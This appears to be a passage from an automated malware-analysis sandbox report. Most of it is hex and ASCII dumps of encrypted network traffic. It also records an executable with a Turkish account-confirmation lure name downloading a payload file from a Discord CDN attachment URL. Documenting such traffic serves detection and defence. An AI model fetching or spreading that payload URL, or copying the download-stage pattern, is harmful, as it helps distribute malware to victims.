dd 5d f2 f2 f7 29 6f cf 45 c3 8e 22 c9 ed 9e c9 75 85 c6 f1 e9 05 01 9a d9 dc db da 02 27 28 29 d7 d4 d3 d2 c6 2f 4f cf d2 cc cb ca e2 d5 ff 61 c5 c4 c3 d3
                                                          Data Ascii: e9(qJ^':%X7NQOOayylzslq^ustqQoM&HbJGrY[ZYSRQOMNKJI[GFEoBPzm`<U [,,-;!eMyC>|746E4/,.%di ])oE"u'()/Oa
                                                          2022-02-07 11:04:16 UTC453INData Raw: a8 3b 39 3e 35 4d 61 34 33 36 cf ce a5 28 0d 3d 1c ea 48 72 07 cb ef f5 49 43 0a 1a 99 35 1d 0f 2b 1e 19 7c 17 16 15 15 13 12 00 ed a7 32 0d 0c 01 2a ae b1 45 1a 25 86 e4 93 1d 9e 5a f5 e7 a2 be fe f9 f8 f7 2a 0a 0b 0c f0 f1 0f 6f f1 ed ec eb d3 e9 e8 e7 cd d2 e7 ce ea c1 28 aa 30 1e f9 f0 dc f9 f6 c5 64 40 f1 f5 d4 f1 b5 7f bc c9 96 aa e1 0a ca c4 bd 93 c4 c3 c6 bc 69 3f bf b9 ba 9b ce 6a 9a a6 ec 95 19 95 71 27 2e 04 07 87 bf 9b ae a9 bc a7 a6 a5 b0 a3 a2 b0 5f 1c b7 0b 9d 9b 9c 9b e3 c1 96 95 90 6d 93 9b 44 0f 89 a7 97 bb 8d 89 33 8e 86 85 c7 83 82 90 7f ff 5f 85 9f 4a 56 59 b8 3c 37 3f 15 56 61 68 90 f6 31 28 75 6b 6a 69 71 67 66 65 37 63 62 61 25 df 5f 5d 09 5a 5a 59 30 55 56 55 e1 52 52 51 0c cd 4f 4d bb 4a 4a 49 4d 47 46 45 74 42 42 41 97 bd 3f 3d
                                                          Data Ascii: ;9>5Ma436(=HrIC5+|2*E%Z*o(0d@i?jq'._mD3_JVY<7?Vah1(ukjiqgfe7cba%_]ZZY0UVURRQOMJJIMGFEtBBA?=
                                                          2022-02-07 11:04:16 UTC457INData Raw: b0 a3 9c 2d b3 b1 49 0f 26 39 ef 5d 82 a8 a8 a7 8d 8d 3b a2 a2 a7 59 3f 92 b3 5d 95 c0 b9 e5 95 54 78 f5 ab a4 6b 90 f0 8f 8b ac f1 77 23 8a dd a6 c2 2c fe 64 e0 47 dc 85 82 83 7b 7c 59 84 8b fa 63 2e 53 a7 be 52 7a 0e 55 7c 91 95 96 6a 4f fd 64 64 65 7d 6d b7 43 5e 5d 5a 73 c7 58 58 51 40 7d ca 52 52 57 8f 54 6f 21 6e 63 4b 49 48 6c 6e da 45 43 44 41 bd 97 a4 3c 3c 3d 25 34 10 ab 37 35 32 1b af 30 cf a9 39 05 b2 2a 2a 2f 08 8e 82 fb 6c 0b 21 21 df b4 37 82 1d 1b 1c 19 1a 3f 8d 14 14 15 0d 1f c7 13 0e 0d 0a 23 97 08 08 01 10 2d 9a 02 02 07 df be 74 1e ed d3 f2 f9 f8 dc de 6a f5 f3 f4 f7 2f 81 f2 6e 61 b1 ca 80 58 d3 07 84 dc 64 1b 1e e0 5f d9 fd 0d 4b 69 de 82 f7 bf 5f 05 ba b3 e9 5b b6 30 32 cc cd ea 55 81 9d 9a 9f e4 37 13 53 ec 5e 87 dc 45 44 45 b9 be
                                                          Data Ascii: -I&9];Y?]Txkw#,dG{|Yc.SRzU|jOdde}mC^]ZsXXQ@}RRWTo!ncKIHlnECDA<<=%475209**/l!!7?#-tj/naXd_Ki_[02U7S^EDE
                                                          2022-02-07 11:04:16 UTC461INData Raw: 64 46 01 5d 77 0c 96 c7 8f d6 46 1e 58 d9 dc dd 30 cf bf 66 21 23 f6 40 39 6d 84 2c e2 75 2b 78 ec 10 70 19 80 71 0b 0a 08 1b 0d 06 14 14 23 d1 e4 a4 27 a5 dd ce 99 8c 6f 99 cf b8 08 0b 0c e3 fd 22 67 cf 7f 08 75 f5 cc c3 e1 c6 46 5b 1a fc c4 39 4e cf fd 92 77 f0 80 82 b6 ee f8 29 2c 2d c0 2a 5e c8 e5 71 ca ca cf db cf d7 d5 e4 6a 22 b4 5e 65 9f eb ea 11 91 d8 80 b8 4b 4a 4b a2 bb a5 b1 2e bc a1 bd bb 8a b8 35 d1 21 ff 84 7a c0 6c 1d 7e a7 68 60 64 65 9f b2 97 96 95 8f a3 97 91 1d 0f 8f 8d c6 8b 8a 98 88 87 ae 6d 85 83 84 a9 96 fe 7f 7b 54 91 7b 79 7e 7c 71 72 6b 4f 5a 9a 8e ef 69 73 ba 43 81 68 68 61 0c 6f ba 29 4a a7 9e df 59 5d 7c 48 a0 ab 33 77 16 8a ec 07 33 74 a3 d6 11 08 4f 4b 4a 49 a8 b8 b9 ba 5f 43 42 41 bd bf 3f 3d 17 22 12 d5 39 37 30 1d d9 32
                                                          Data Ascii: dF]wFX0f!#@9m,u+xpq#'o"guF[9Nw),-*^qj"^eKJK.5!zl~h`dem{T{y~|qrkOZisChhao)JY]|H3w3tOKJI_CBA?="9702
                                                          2022-02-07 11:04:16 UTC465INData Raw: a4 ab aa a9 a9 a7 a6 b4 a6 a0 cd e0 5e 1f 95 b7 8f ab 9e 99 90 97 96 95 95 93 92 80 6d 0c e0 cf 8d 8b 80 a3 9b b7 82 85 8c 83 82 81 7e ff 7f 6c 7e 78 15 3a 79 77 7c 5f 67 43 71 71 88 ef 6f 6d 6d 6b 6a 78 6a 08 22 64 64 69 48 61 8c ef 5a 5d 55 5b 5a 59 59 57 56 44 56 50 56 3e ea ce 4f 47 66 4b 4a 49 5b 77 43 45 4d 43 42 41 be bf 3f 2c 3e 38 3e 4a 7e 36 36 3f 1e 33 32 31 dc 9f 29 2d 26 2b 2a 29 29 27 26 34 26 20 26 24 b0 d8 1e 1d 16 31 1a 19 0b 27 15 15 13 13 12 11 ee 8f 0f 1c 0e 64 42 08 08 0d 2c 05 17 33 01 01 f4 7f ff fd fd fb fa e8 8b d7 f4 f5 f2 73 ab f1 0f 6b c5 ed ff db ec e9 64 eb e6 e5 b7 e3 e2 f0 1f 7f 7f 69 47 ff fa 56 de 62 92 b4 f1 c0 d7 ce 15 11 8a f7 cc cb ca d7 c1 c7 c6 5a c5 c3 c2 91 39 3f bf 64 b9 bb ba bc b8 b7 b6 e0 b3 b3 b2 a9 44 2f af
                                                          Data Ascii: ^m~l~x:yw|_gCqqommkjxj"ddiHaZ]U[ZYYWVDVPV>OGfKJI[wCEMCBA?,>8>J~66?321)-&+*))'&4& &$1'dB,3skdiGVbZ9?dD/
                                                          2022-02-07 11:04:16 UTC469INData Raw: 23 0d 25 0e 23 22 21 cc af 1b 1d 14 1b 1a 19 19 17 16 04 16 10 6f 78 ef 8f 0b 27 1f 3b 09 09 01 07 06 05 05 03 02 10 fd 04 95 fd fc ff d1 f9 d2 f7 f6 f5 e7 c3 f6 f1 07 6f ef ed ed eb ea f8 ea e4 9b 8f e4 e3 e6 cb 0c 6f dc dd d5 db da d9 d9 d7 d6 c4 d6 a8 b9 d1 2f 4b e4 cd e6 cb ca c9 db f7 c2 c5 cc c3 c2 c1 3e 3f bf ac be b8 c7 d2 b8 b7 b2 9f a7 83 b1 b1 46 2f af ad ad ab aa b8 aa dc ca a5 a4 a7 89 a1 75 1f 9f 9d 8f ab 9e 99 90 97 96 95 95 93 92 80 6d 0c f2 e1 8c 8b 8e a3 9b b7 85 85 8d 83 82 81 7e ff 7f 6c 7e 00 17 79 78 73 5d 75 5e 73 72 71 9c df 6b 6d 64 6b 6a 69 69 67 66 74 66 60 1f 0c 9f df 5b 77 4f 6b 59 59 51 57 56 55 55 53 52 40 ad b4 21 4d 4c 4f 61 49 62 47 46 45 57 73 46 41 b7 bf 3f 3d 3d 3b 3a 28 3a 34 4b 5b 34 33 36 1b dc 9f 2c 2d 25 2b 2a 29
                                                          Data Ascii: #%#"!ox';oo/K>?F/um~l~yxs]u^srqkmdkjiigftf`[wOkYYQWVUUSR@!MLOaIbGFEWsFA?==;:(:4K[436,-%+*)
                                                          2022-02-07 11:04:16 UTC473INData Raw: 74 90 10 1e 99 9d 94 a9 d5 98 9e 97 dd a6 de 91 94 91 3f 3a e7 a4 8a 8b ce be c7 86 8c 85 89 b9 fe 8e 75 ff 65 47 00 74 7c 79 b8 4c 1e 5c 72 73 a7 4a 21 e9 79 6d d1 57 c4 55 7e 67 b9 59 8e 5f 74 61 9e e2 f1 61 4a 5b 52 64 f6 6b 50 55 83 6e f4 46 a9 cf 8f 73 03 4a 4c 49 b3 78 fb 5f 42 43 60 01 02 a5 39 3d 75 7b 75 38 3e 37 ad 75 f5 33 24 31 ab ec 81 11 3a 2b af 6a c2 1b 30 25 39 67 c8 1d c9 9f 34 59 f6 27 1c 19 6d 53 59 14 12 13 b7 55 5a cb 09 0d e2 4f bf 4d 0e 07 3f 40 b1 47 04 01 9f 3a 4a b9 fa fb 5e bc 4d b3 f0 f5 1a b6 47 b5 09 6f 14 a8 59 af ec e9 90 b2 8d c1 e2 e3 67 b4 74 7b cd dd 91 8d 4a c6 ca d7 8c 83 44 cc c0 d1 43 19 5f d2 ca cb d1 91 fd c7 c0 c5 ff 9b f7 c1 39 3f e6 e5 01 a1 35 b8 d5 ef b6 b5 b2 b3 ce e9 8e 2f a9 ad 3f f3 6b a9 ae a7 16 fd 65
                                                          Data Ascii: t?:ueGt|yL\rsJ!ymWU~gY_taaJ[RdkPUnFsJLIx_BC`9=u{u8>7u3$1:+j0%9g4Y'mSYUZOM?@G:J^MGoYgt{JDC_9?5/?ke
                                                          2022-02-07 11:04:16 UTC476INData Raw: 45 44 43 c1 41 94 b1 6e 3c 3d 3b 2a 1c 39 37 36 35 b7 2b 67 31 c5 af 2e 2d 3c 6b 2b 29 28 27 a5 25 5b 2d 28 21 de 9f 3b 5d 1d 1b 1a 19 9b 17 8d 1b 1e 13 13 11 eb ce 0e 0d 0c 0b 89 09 bf 09 0c 05 05 03 2a 40 fe 7f ff fd 7f fb 29 f7 f2 f7 f7 f5 b8 b2 f3 f1 0f 6f 6c ed 1c e5 e0 e9 e9 e7 96 a4 e5 e3 e2 e1 9c 5f d3 d2 8a da db d9 50 96 d7 d5 d4 d3 d4 c9 7a 4f c5 cd cd cb 56 88 c9 c7 c6 c5 c2 db 97 c1 35 3f be bd 08 fa bb b9 b8 b7 a7 ad 5b b3 91 b1 4e 2f 9f ef ad ab aa a9 bb af 06 b5 27 a2 a3 a1 cf 5d 9e 9d 9c 9b 89 91 24 87 1e 94 95 93 62 d3 6e 0f 8f 8d 9f 83 52 99 05 86 87 85 88 c0 83 81 7f ff 6c 75 88 6b e8 78 79 77 5e 36 75 73 72 71 49 ed f3 7c c7 6a 6b 69 10 24 67 65 64 63 a4 63 20 ce ef 5c 5e 5b ca 1a 59 57 56 55 d7 53 b5 40 1b ce 4d 4d bc 08 4b 49 48 47
                                                          Data Ascii: EDCAn<=;*9765+g1.-<k+)('%[-(!;]*@)ol_PzOV5?[N/']$bnRlukxyw^6usrqI|jki$gedcc \^[YWVUS@MMKIHG
                                                          2022-02-07 11:04:16 UTC481INData Raw: 3f 3f af bd a4 8e 7c bc 3c b7 3e 03 b5 b3 b2 b1 5f 2f 9b 98 67 ae 2e a9 34 11 a7 a5 a4 a3 b2 a1 01 2a 5c 9f 18 9b 2a 2f 99 97 96 95 84 93 e8 a4 9d 0d 0b 8d 48 3d 8b 89 88 87 96 85 12 b6 57 84 fb ff 47 7c 7d 7b 7a 79 68 77 c4 40 2c 73 f6 71 4b ee 6e 6d 6c 6b 7a 69 a6 52 1d 65 e0 63 ba d7 9e df 5f 5d 4c 5b b0 6c f7 52 d2 55 24 30 53 51 af cf 5f 4d 4a 7d fd 4b cc 47 26 44 45 43 42 41 af bf 1d 0b 5a 3b be 39 b4 b0 37 35 34 33 22 31 f1 99 a1 29 a8 2b 8a ae 29 27 26 25 34 23 78 17 4a 9b 9b 1d a8 9c 1b 19 18 17 06 15 62 25 88 15 6b 8f c7 8a 0d 0b 0a 09 18 07 94 33 a5 07 86 01 23 f8 fe fd fc fb ea f9 56 c1 5c f1 70 f3 aa 63 0e 6f ef ed fc eb 20 df 04 e3 62 e5 a0 71 e3 e1 1f 5f cf dd 3a ed 40 da 5c d7 3a 63 d5 d3 d2 d1 3f 4f cd fa b4 c9 4e c9 d8 e2 c7 c5 c4 c3 c4
                                                          Data Ascii: ??|<>_/g.4*\*/H=WG|}{zyhw@,sqKnmlkziRec_]L[lRU$0SQ_MJ}KG&DECBAZ;97543"1)+)'&%4#xJb%k3#V\pco bq_:@\:c?ON
                                                          2022-02-07 11:04:16 UTC485INData Raw: 3b 3a 39 39 37 36 35 34 33 33 31 cf af 2f 2d 2e 2b 2a 29 28 27 27 25 24 23 22 21 dd 9f 1f 1d 1c 1b 1b 19 18 17 16 15 15 13 12 11 ef 8f 0d 0d 0c 0b 0a 09 09 07 06 05 14 13 03 01 ff 7f ff fd fd fb fa f9 f8 f7 f4 f5 f4 f3 f2 f1 0e 6f ef ed ec eb e8 e9 e8 e7 e6 e5 e5 e3 e2 e1 1f 5f dd dd dc db da d9 d9 d7 c9 c8 d4 d3 d0 d1 1f 52 cf cd cd cb 87 d4 c8 c7 c7 c5 c4 c3 c2 c1 3d 3f bf bd bc bb b9 b9 b8 b7 b6 b5 b0 b3 b2 b1 4f 2f ae ad ac ab aa a9 aa a7 a6 a5 a4 a3 a1 a1 5f 1f 9f 9d 9d 9b 9a 99 98 97 97 95 94 93 92 91 6d 0f 8f 8d 8c 8b 8b 89 88 87 86 85 86 83 82 81 7f ff 7c 7d 7c 7b 7a 79 79 77 76 75 74 73 70 71 8f ef 6f 6d 6f 6b 6a 69 68 67 67 65 64 63 62 61 9d df 5f 5d 5c 5b 5b 59 58 57 56 55 56 53 52 51 af cf 4e 4d 4c 4b 4a 49 49 47 46 45 44 43 43 41 bf bf 3f 3d
                                                          Data Ascii: ;:997654331/-.+*)(''%$#"!o_R=?O/_m|}|{zyywvutspqomokjihggedcba_]\[[YXWVUVSRQNMLKJIIGFEDCCA?=
                                                          2022-02-07 11:04:16 UTC489INData Raw: b8 b5 34 f4 61 b1 41 2f 0f ea 7f ab a4 a9 68 e0 75 a5 aa a3 42 e6 8c 1f 91 9d 9c d3 49 99 96 97 b6 dd 47 93 9c 91 2f 47 5c 8d 82 8b ea c1 5b 87 88 85 04 cb 51 81 71 ff df 35 af 7b 74 79 b8 3f a5 75 7a 73 92 39 5c ef 61 6d 6c 22 b9 69 66 67 46 2c b7 63 6c 61 df 96 8c 5d 52 5b 3a 10 8b 57 58 55 d4 1a 81 51 a1 cf ef 04 9f 4b 44 49 88 0e 95 45 4a 43 a2 08 6c bf 31 3d 3c 71 e9 39 36 37 16 7f e7 33 3c 31 8f e5 fc 2d 22 2b 4a 63 fb 27 28 25 a4 69 f1 21 d1 9f bf 57 cf 1b 14 19 d8 5d c5 15 1a 13 f2 5b 3c 8f 01 0d 0c 40 d9 09 06 07 26 4e d7 03 0c 01 bf 34 2c fd f2 fb 9a b2 2b f7 f8 f5 74 b8 21 f1 01 6f 4f a6 3f eb e4 e9 28 ac 35 e5 ea e3 02 aa cc 5f d1 dd dc 97 09 d9 d6 d7 f6 99 07 d3 dc d1 6f 03 1c cd c2 cb aa 85 1b c7 c8 c5 44 8f 11 c1 31 3f 1f f1 6f bb b4 b9 78
                                                          Data Ascii: 4aA/huBIG/G\[Qq5{ty?uzs9\aml"ifgF,cla]R[:WXUQKDIEJCl1=<q9673<1-"+Jc'(%i!W][<@&N4,+t!oO?(5_oD1?ox
                                                          2022-02-07 11:04:16 UTC493INData Raw: 7f 8e af 57 41 5a 42 64 1c 6c 74 52 66 46 45 66 13 e7 d0 2e 5a 65 22 40 78 48 76 6e 60 5d 13 20 70 d6 bb 7a 7a 5d 6f 66 44 3d 4b 4e 73 4b 3b 6b 60 85 11 bb a7 93 93 9f ae 9d f7 8f a2 a6 c2 c4 be 40 05 81 8f db d3 8c b9 bc ae a9 a6 d3 b1 83 8a 4a 19 ea 85 bf db 99 ec 8c 86 b2 ad bd a7 82 bf 60 01 a9 b4 8b 89 98 80 fc fe b0 9d a3 a1 ab ad 69 3f fe db e4 de cb 8c 89 f6 dc 81 cc d5 fc c0 3b 60 eb e4 e2 d8 ff f8 ef e8 97 f0 c6 a3 96 99 68 74 fd f3 ab d1 cd d7 d9 d2 e0 db d0 ab f3 f7 05 5b dc e7 f6 f8 e1 fe e6 87 ef c6 c0 cf d6 c5 10 bd 12 19 2e 17 1e 37 1d 06 07 22 24 31 18 49 d9 9e 3a 2a 6c 25 32 01 38 0e 34 24 13 2a 30 11 ae 87 6b 0f 29 10 14 30 12 60 00 66 15 3f 10 12 af 98 39 29 27 0f 27 06 02 14 16 71 33 0a 10 28 eb ed 6e 45 79 43 4f 68 71 54 5a 42 34 7c
                                                          Data Ascii: WAZBdltRfFEf.Ze"@xHvn`] pzz]ofD=KNsK;k`@J`i?;`ht[.7"$1I:*l%284$*0k)0`f?9)''q3(nEyCOhqTZB4|
                                                          2022-02-07 11:04:16 UTC497INData Raw: 9e c3 dd db fd f6 ec cd fd e6 c4 d6 18 47 cf ab a8 ae ca fa db a6 dc 95 a0 dc c6 d3 21 3a c6 ef fa b9 c4 bb c6 f2 bf d2 ea c4 c4 ee 09 b9 39 2a 0e 0e 13 79 37 13 47 38 2c 3e 1b 47 bc be 0e 39 59 13 0e 05 07 24 0e 21 5c 5a 11 52 da e7 0e 5d 13 13 37 3e 33 60 03 03 61 0a 36 62 de 8e 1f 7e 35 2d 2e 2e 3c 35 30 1c 32 2b 2b 41 c9 cb 71 56 77 6d 78 60 0e 51 44 44 66 61 04 59 a7 ca 46 67 79 72 69 10 4b 48 40 25 10 15 65 42 98 a9 48 44 2a 6c 7c 2f 21 7a 27 59 5d 65 50 4b d8 c3 55 75 3d 49 46 09 52 61 4a 4b 6c 6e 52 40 95 2a 87 9b 9b c8 ca b0 c1 b0 ba bf 8d 97 81 82 47 19 a1 ed d8 89 db 84 9d 8a a8 9f 87 94 b3 8b 58 15 ee b7 8b 96 b8 90 a8 a1 97 98 e4 a0 b0 d1 58 3f a3 98 a6 bd fe f8 a4 82 94 83 a0 85 a8 91 0a 7d fd ff fb f2 cb f6 80 fd d5 b5 f1 dd c4 d8 3d 40 c1
                                                          Data Ascii: G!:9*y7G8,>G9Y$!\ZR]7>3`a6b~5-..<502++AqVwmx`QDDfaYFgyriKH@%eBHD*l|/!z'Y]ePKUu=IFRaJKlnR@*GXX?}=@
                                                          2022-02-07 11:04:16 UTC501INData Raw: 66 44 25 67 4f 43 52 ac ae 2b 42 5d 7f 7e 76 76 64 16 7d 78 50 67 54 83 bc 65 34 3f 78 58 59 6e 44 65 73 71 44 31 48 b5 09 c9 a9 aa b9 fa bd 91 94 82 9c 9b 9d 93 83 76 0f dd ed bf 92 99 9d 8d 8a c8 a6 8b 8f 8e 84 7c 2b b6 b2 b2 a8 f4 9e bd b9 b3 a7 bd b0 d2 e6 7b 3b 8d fe 8d fb ad a5 f8 8f 8f 8b fd b9 a3 a8 5d 76 d4 f7 ce f7 89 8b fc ed f7 b5 f8 da c1 c5 2f 1e af 9b f6 93 93 e8 d9 e5 dc c4 f4 c6 cf f8 1c 45 d5 f8 db cf cd de dc d0 c1 e7 a5 df 92 d9 3e 7c c7 bc c3 db f8 d0 e9 cd b2 b4 de d5 c7 b2 0d 96 38 44 33 29 2d 15 3d 14 76 33 46 05 14 3e c4 84 36 21 3d 1d 1b 2b 25 10 36 07 17 33 30 56 fd b7 6e 3e 0d 33 5a 0d 0b 6e 1c 21 66 03 39 19 c3 a5 3b 1c 1d 0c 2b 27 09 77 05 2c 35 76 29 2f d5 fe 7e 3d 57 6e 69 75 0f 72 58 77 06 46 51 60 ab f8 18 4c 66 69 41 45
                                                          Data Ascii: fD%gOCR+B]~vvd}xPgTe4?xXYnDesqD1Hv|+{;]v/E>|8D3)-=v3F>6!=+%630Vn>3Zn!f9;+'w,5v)/~=WniurXwFQ`LfiAE
                                                          2022-02-07 11:04:16 UTC505INData Raw: cf d1 2a 6b fa ef 9c f1 f2 cf c2 db d5 a7 ee d0 d0 de 1e 62 bf b8 cd fd cc cd ce d1 d1 d1 cd db f7 ec 7f bb 36 4e 10 31 2c 2b 0a 41 45 1d 40 3c 1f 38 ff bf 5b 1e 36 58 12 06 30 1d 1c 00 64 2e 24 07 dc 87 27 1a 2d 2b 6b 12 0f 02 24 19 22 29 3e 12 f9 ba 05 04 24 3f 09 05 48 0a 35 22 06 2c 3a 13 da cc 4a 51 48 3b 77 4a 5f 75 59 4d 67 47 4b 5d aa af 1b 43 48 12 1a 45 6c 12 16 15 6f 6e 70 5b ee f5 7c 6a 4e 7a 53 58 59 2f 7c 5d 59 13 51 7d 8e fc 7c 3e 53 51 65 67 6d 07 40 73 4d 34 7a 68 98 10 88 8d b8 b6 b1 b5 b7 92 a7 98 c5 bc 82 c7 4b 0d b5 8e 87 eb ae 8c 84 82 92 80 a2 8a 8e 84 1f 34 ba af b2 be b6 ea ea d7 93 b8 9b a2 9e b8 77 18 81 f4 fb ae a6 ba a7 83 93 a9 80 95 8d ab 0d 59 ed f9 fd bb 83 ec de e1 ff 85 ec ff d1 80 2e 5b e1 c2 fa 99 c8 fa c4 e5 e2 ec 90
                                                          Data Ascii: *kb6N1,+AE@<8[6X0d.$'-+k$")>$?H5",:JQH;wJ_uYMgGK]CHElonp[|jNzSXY/|]YQ}|>SQegm@sM4zhK4wY.[
                                                          2022-02-07 11:04:16 UTC508INData Raw: 06 00 71 71 76 d0 8d 58 0d 6e 7e 0f 7c 41 47 6c 76 46 79 7e 64 ba f9 55 2d 54 6a 4c 18 6a 43 7f 42 56 10 54 54 8a ed 28 7b 7a 4c 68 49 6c 75 71 43 2c 45 78 11 ad e3 3d 69 68 48 47 5b 51 36 72 67 47 79 4d 4b bd 4c 89 cc 8d 99 cc ac 9f c0 97 b4 f4 83 9d a0 43 2a a4 be 89 9b d8 a7 8a d0 d6 ae 87 d6 d5 94 46 30 9b b3 8f 8a 90 bd d8 a3 e3 9d bf 86 82 e8 6e 04 8a f8 87 ad fc fc 86 b2 f7 83 85 84 83 82 4c 6a e5 e5 fd bb c2 ce d2 f5 83 fc fa d9 84 82 1d 6a c0 e3 ed da 9f ea ca ef d4 e7 cf d4 eb c3 15 1f dc f1 fd e8 e9 af c7 d0 f3 e1 db e3 e6 f8 00 61 fc 8d fe ba c3 e8 c5 f5 ed f1 f6 d1 c1 e4 1a 8c 14 0f 49 0b 13 0a 0f 3e 26 11 22 25 47 71 e3 9b 03 1d 2a 2a 5e 0b 0a 15 51 22 0e 3a 20 59 af bd 39 6e 6c 28 0e 1f 3c 25 14 55 05 23 38 15 e0 a3 17 19 7d 3d 2e 3c 3a 2e
                                                          Data Ascii: qqvXn~|AGlvFy~dU-TjLjCBVTT({zLhIluqC,Ex=ihHG[Q6rgGyMKLC*F0nLjjaI>&"%Gq**^Q": Y9nl(<%U#8}=.<:.
                                                          2022-02-07 11:04:16 UTC513INData Raw: 6d 77 bf 84 ca ef f2 cc f6 de e3 c1 f9 d2 fa c2 19 6b e3 98 ce 98 93 c2 9b e8 eb e2 c2 e4 a2 92 30 54 f6 da d9 c3 aa c8 f7 f2 f1 d6 e5 c7 f6 c6 04 61 d6 f4 ef df f9 e3 f8 ea 86 b3 d4 b1 e5 d4 29 b7 49 07 0e 37 2d 1b 1d 3b 32 4c 1b 41 11 38 d9 a3 2e 1b 5e 25 6a 3d 5d 3f 5e 23 02 0c 00 3b d3 92 1d 3b 36 0d 3f 3e 1b 02 05 38 07 01 35 09 e2 a1 4f 2b 39 04 06 0a 06 08 03 08 02 24 20 14 c6 d2 51 6b 0f 6c 62 56 4d 56 7e 7c 59 69 32 5d 8b e8 66 4f 15 6f 66 5c 60 6f 4b 4c 13 14 4c 18 ba ed 70 2d 51 68 58 7d 2d 5b 16 7c 6e 26 23 25 96 da 67 74 47 51 4e 79 4f 52 4b 3c 72 6f 35 5b 99 0a 8b ab 90 95 fa bc 93 c1 9e be ac a7 ab bf 5f 04 ad ae 86 a9 92 8b da d6 a5 ac b0 ac db b9 55 11 df 8a bd b6 ae 9d 8a ba e4 91 87 91 85 b4 69 77 ad f8 9e a6 ff 8a 91 ab 8b 92 9d 84 c2
                                                          Data Ascii: mwk0Ta)I7-;2LA8.^%j=]?^#;;6?>85O+9$ QklbVMV~|Yi2]fOof\`oKLLp-QhX}-[|n&#%gtGQNyORK<ro5[_Uiw
                                                          2022-02-07 11:04:16 UTC517INData Raw: 2b 3f 3f 18 35 37 27 05 31 37 11 cd ae 26 24 28 0b 2b 28 2d 23 06 24 21 2a 21 01 df 9d 17 ad 23 44 65 08 cd 1d 2c 12 12 06 00 55 ee 9d 37 0a 0a 1e 18 4d 09 15 32 02 02 16 10 45 fe 6d c2 fa fa ee e8 bd f9 e5 b6 f1 f4 f3 e0 c9 0b 6f ef ff d8 ef ea e9 fa da e2 e5 e4 f1 a2 e5 17 5f cd e5 d8 d3 da cb ec d3 de d5 c6 ee d6 d9 2f 5d 8f c9 ec ca c8 d5 cb e7 c6 cd c0 e3 c2 d3 32 3c 9f bd b2 bc aa b8 b9 a9 b6 ab b4 b4 82 b0 4e 2e bf b3 ac af aa a8 b4 bb a1 a3 b1 b1 e3 a0 4c 1f 9b bd 9c 88 9a 9d b0 97 85 95 97 95 80 d4 6c 09 9d c4 88 8b 8a 9b cd 83 86 85 96 ca 87 81 7e fe 6d 34 78 7b 7a 64 7d 71 76 74 66 7a 60 7c 88 ef 6d 7f 29 65 78 60 60 67 65 79 76 26 6c 73 d6 db 57 5d 4e 1e 5e 51 58 45 1f 51 5c 53 4f 54 ac c9 5d 01 48 4b 4a 5b 04 41 46 44 56 12 50 10 bb b7 3f 2f
                                                          Data Ascii: +??57'17&$(+(-#$!*!#De,U7M2Emo_/]2<N.Ll~m4x{zd}qvtfz`|m)ex``geyv&lsW]N^QXEQ\SOT]HKJ[AFDVP?/
                                                          2022-02-07 11:04:16 UTC521INData Raw: bf b1 b3 b1 ae b8 47 28 ac b0 af ba 28 cc a1 a3 86 a4 aa ad a6 81 5f 02 9c b8 9b 8a 87 9c 8a 17 73 88 86 12 8b 99 7d 8e 96 9c 0d ae 98 09 6d 95 07 a4 96 02 9f 9c 7a e7 62 78 74 7e 78 7b 71 73 70 64 f6 4a 7b 51 8d ee 7e ef 55 7a eb 28 60 67 62 64 7c 7e 67 69 97 d9 7f 5c 5d 49 db 44 5e 50 54 47 d5 4e 5b 59 8f cd 4e 5f 7d 59 cb 60 4b 67 46 40 47 63 42 42 ba 9f 3f 2c bd 16 39 19 38 3a 35 15 34 37 31 11 cf a9 2c 0d 2c 27 29 09 28 2e 25 05 24 28 21 01 df 98 1a 3d 1d 06 1f 11 1e 37 16 08 06 92 27 15 cf 8f 1d 14 0f 2b 0a 11 0f 27 04 17 5d 0b 1f 02 fa 5f fd f3 f2 f5 fe d9 f8 e5 bf f0 d4 f3 e3 70 4e 67 cf ef ed f9 db fb 69 a2 e8 c5 e7 f1 63 fc 0e de fa cc 5d 92 cb 58 95 cf d1 dc c9 d6 cf d4 32 4a dd 4c 99 d9 4b ac da 47 23 d7 45 aa d0 41 a2 36 b9 9d bd ba ab 38 e5
                                                          Data Ascii: G((_s}mzbxt~x{qspdJ{Q~Uz(`gbd|~gi\]ID^PTGN[YN_}Y`KgF@GcBB?,98:5471,,')(.%$(!=7'+']_pNgic]X2JLKG#EA68


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.349820162.159.134.233443C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-02-07 11:04:18 UTC523OUTGET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1
                                                          Host: cdn.discordapp.com
                                                          Connection: Keep-Alive
                                                          2022-02-07 11:04:19 UTC523INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Feb 2022 11:04:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 177152
                                                          Connection: close
                                                          CF-Ray: 6d9c22fea8f89231-FRA
                                                          Accept-Ranges: bytes
                                                          Age: 33569
                                                          Cache-Control: public, max-age=31536000
                                                          Content-Disposition: attachment;%20filename=RDi
                                                          ETag: "64a63f332c74248c2e4344632a8f0214"
                                                          Expires: Tue, 07 Feb 2023 11:04:19 GMT
                                                          Last-Modified: Sun, 06 Feb 2022 07:38:05 GMT
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: HIT
                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                          x-goog-generation: 1644133085557986
                                                          x-goog-hash: crc32c=gVbjfA==
                                                          x-goog-hash: md5=ZKY/Myx0JIwuQ0RjKo8CFA==
                                                          x-goog-metageneration: 1
                                                          x-goog-storage-class: STANDARD
                                                          x-goog-stored-content-encoding: identity
                                                          x-goog-stored-content-length: 177152
                                                          X-GUploader-UploadID: ADPycdvd0R5Q2UoyoHe7lECHDxAbymy6zBTQkP5bdNZ-TDlJZejG9tAYVpRmOGbPTyF4hgaq85knqjp-0tygu31FjJ4
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0l3%2BJIKaLkReZj%2BPYIag20HHKs8XIViOQlN%2F8OZBuw9wj4NMorrQncew6bDd5SP1nnY9bNE6DT%2BsUPZx%2BCWYQGVJEYVESIu3w6ieT8pt0Vd6O5R7sMlOeTzNNnLT1Jl%2BebvjHg%3D%3D"}],"group":"cf-nel","max_age":604800}
